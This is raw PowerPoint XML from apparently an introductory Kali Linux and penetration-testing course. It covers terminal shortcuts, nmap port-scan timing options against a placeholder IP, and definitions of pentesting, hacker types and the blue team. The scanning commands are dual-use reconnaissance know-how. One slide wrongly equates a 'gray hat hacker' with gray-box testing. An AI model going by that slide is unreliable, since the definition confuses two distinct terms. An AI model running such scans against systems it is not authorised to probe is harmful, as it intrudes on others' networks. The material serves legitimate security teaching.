                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C66DFE3-E145-0C0A-6E4E-43B4155E9916}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3872966" y="3106765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 scan port </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383133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B1C3-F6F8-FDF6-8819-F857DEFE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06EF4-854B-614E-C658-20DCF84F8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09D8D9B-7E18-B71A-C72C-352DC7EBB1D8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DDE57AF-F35E-5157-7A1B-087973A378D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F271D47-EAC0-D91E-16D4-3EAB44A3895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14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DE520F9-B7A8-E223-DE85-BAD68CC35653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C6CACE52-FADD-B322-3D57-00B0072D27B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2FCA55A5-306A-2994-0D7D-89C6E2F06A93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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95D1DB60-E9BC-1480-2CE5-9EE984D093E1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CF0A0099-277B-E673-25EB-9CD05EC13552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B2E73C4D-DCD1-EEB5-E2C8-1FC369BDE4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4ACB4021-FC23-B56D-5CBA-CB9088EF3C49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0A54292-A9A1-8093-F4AA-6BB31FCB09CC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7E3D927F-BA3A-8B79-D4ED-25D1457F58E3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14</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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E1AE58D-FD16-5853-DB2C-B4958AE0B3D1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7422590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1.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" spc="-10" dirty="0"/>
              <a:t>Important abbreviations in Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" spc="-10" dirty="0"/>
              <a:t>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1C0E9220-66F3-A241-5CB4-E5FF2BDFCB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467583" y="1915698"/>
            <a:ext cx="29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- Ctrl + Shift + D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CFDC77-8F87-7D3A-BE01-5A63D0D6DF98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589007" y="2079409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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89F091D9-3DAA-C3AD-60B7-A4253128A0B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4513362" y="1876878"/>
            <a:ext cx="38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Dividing the terminal in other ways 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F63BBFD0-AD74-9A5A-CDB8-1FC13486096D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599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Ctrl +  Shift + E     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A63A20-1A2F-9BBE-D0E3-874B9AD6360B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2611804" y="2511361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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E17F8AB-A716-C2FB-15B4-7551C821D115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4640375" y="2351944"/>
            <a:ext cx="401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Delete the last section in the terminal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7BF7AEB-EBF1-8529-8EA9-F50D4BC7B41C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="2724150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 Ctrl + Z   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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0E221B-C5AB-D4CC-6CD6-AB03EEA7B8AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1967559" y="2881259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 Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F829182-3908-9D08-7B56-1617E4E1212E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3248948" y="2690903"/>
            <a:ext cx="552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Pause the command and send it to the background. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D7D962C-41CC-E4F2-8BA0-DF039E6E75DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="3184323"/>
            <a:ext cx="331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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r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96B162CA-88FE-F380-E145-8AD642055C36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3969298" y="3214963"/>
            <a:ext cx="368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temporary order is returned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90C04C-543A-0C64-1B6B-18440702F7A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411184" y="3418859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214B07-CDFC-BB6F-24CB-F0A591D80D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2945447" y="3835764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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BFC57C3-2944-3C8F-6731-0BEF6EE22410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3603453"/>
            <a:ext cx="30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- Ctrl + D   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A0D99F4-2DE2-49B4-6E7C-A67058EE88F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4339057" y="3661575"/>
            <a:ext cx="36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Exit The Terminal  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11580157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191325-E613-7505-965C-6D6D24A2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3663B5-B359-1C3F-CA6D-57B2ACAE0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69" y="1192340"/>
            <a:ext cx="8060055" cy="3319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ABD3E8F-009E-F227-F2BE-147A982CFF6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342070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6DAF059-BEAD-C048-AB8D-B1DC72A7CBA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27955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81212FA-C87F-2D34-873A-133253065D2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27955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140</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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AC16AA2-765E-D133-A669-BD8DE1358566}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165419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25E9EB1C-856A-7975-E1B8-61712B5275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" y="0"/>
            <a:ext cx="9144000" cy="5143498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96AE7E50-9204-9F54-1212-699BF90816AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2997" y="1083386"/>
            <a:ext cx="9173210" cy="3347085"/>
            <a:chOff x="-13716" y="1034796"/>
            <a:chExt cx="9173210" cy="334708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ABF74856-1FCA-49BB-91CC-79CE52D788F5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A128913E-1DB2-D35F-259D-E5A959A85FBA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D7EA25D3-7B1F-7B9F-4C14-C686D4BE69B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D00F8E68-FE9F-00F7-ABA7-DE4E729D2CD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428878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Nmap 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BD1E2B9C-3E7F-BF2A-F9D4-47CF55F764F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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3A16053C-BB56-C347-01B4-7EAAAD6883B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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140</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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FFB06B8A-0CB2-E792-369C-EA1168443B8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246202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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>4.1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" spc="-10" dirty="0"/>
              <a:t>command Nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> 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0791C9F0-1C52-F8F3-C8F7-5F2B3C9B7A2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403654" y="1906674"/>
            <a:ext cx="332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–T1/T2 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;  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294204-DE4B-AF9C-CC94-F406A20D0BC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133999" y="208090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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9527142-A5E6-88B4-BC7C-4EDF11377370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3753084" y="1906674"/>
            <a:ext cx="318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 scan port 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48B7A56E-53C4-54F0-D22B-34C43013C902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396893" y="2329984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–T3 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;     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BFA6E0-4B34-1433-DBAC-F3AF90D188C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460131" y="250609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Text Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF32D800-51F5-E788-EA22-D86ED12524F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4782247" y="2306832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 scan port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87171A-DBE1-A33E-F314-CA545D107032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416668" y="2927552"/>
            <a:ext cx="15700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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F79A7FB4-85CA-E84B-08E6-093C450B2E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4154856" y="2740228"/>
            <a:ext cx="40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 scan port </a:t>
            </a:r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10ADB012-2FB0-62CB-03A0-D4147B37FF94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-526609" y="2657388"/>
            <a:ext cx="49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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –T4  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2298A8A2-553A-90DD-F705-7C19BF3F49FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17346" y="30257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–T5 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;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2B2CFE7-3687-F871-8C8A-D2A0A0966A4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133999" y="323298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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E253CF-F641-5778-827D-0E88693C526E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3872966" y="3106765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Faster than T0/T1/T2/T3/T4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310227209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3E05-E55A-446D-5C0A-DD29759B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67" y="285750"/>
            <a:ext cx="7936052" cy="446276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7.1 What is penetration testing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4985B-E64E-F4B0-BF6D-EB1327A37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082" y="1648420"/>
            <a:ext cx="8060055" cy="1846659"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Penetration Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a simulation of a simulated cyber attack conducted by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> specialists to detect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>weaknesses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>networks.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212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5E80-A045-049D-698E-0819B226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7.1 What is penetration testing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D861C-D2B3-EF38-72F4-3E87C39F0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67" y="1192340"/>
            <a:ext cx="8060055" cy="2954655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Why do we need penetration testing?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>1- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>detect vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>before attackers exploit them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>assess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the strength and effectiveness of security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and procedures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>3- To educate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the team about real risks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>4- To improve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the security system in a realistic and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>practical way.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1157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3527-0746-CDD4-3F6E-CA041EDB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7.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Type of penetration testing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87F7-7990-55A3-5666-9EFBE2520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91" y="1657350"/>
            <a:ext cx="8060055" cy="2215991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="1" dirty="0"/>
              <a:t> black hat hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a hacker who performs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>unauthorized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>against a system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with the purpose of causing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> damage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or gaining profit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is also a category of black hat hackers called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>crackers.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9177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F4D33-9CD3-E5F3-B6AE-8FB2CE0A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7.1 Type of penetration testing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CBF12-4E7A-4D28-0EE6-6546B6D42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861" y="1809750"/>
            <a:ext cx="8060055" cy="184665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white hat hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a professional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>penetration tester </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ethical hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>who performs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>authorized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacks against a system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>helping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the client solve their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>security issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>White hat hackers do not perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>illegal actions.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3262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30A6-A745-1BA2-14D2-2028BA28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7.1 Type of penetration testing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EB3CA-5F25-8C44-5716-166297E28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74" y="1657350"/>
            <a:ext cx="8060055" cy="2585323"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Gray Hat Hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>penetration testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in which the tester is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>given partial information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>about the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> system, such as the login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>normal user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> tester </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>provided</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>full details like in a white box test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, nor is he left completely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>uninformed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> like in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>black box test.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4373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B523-03A1-80D0-BF33-651FD8CD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7.2  Blue Team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17B00-0FA3-4FE0-4764-E3B54CC98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700" y="1504950"/>
            <a:ext cx="8060055" cy="221599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Blue Team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is the group of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> experts tasked with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>defending an organization's information systems from cyber threats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Their primary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>defensive </a:t>
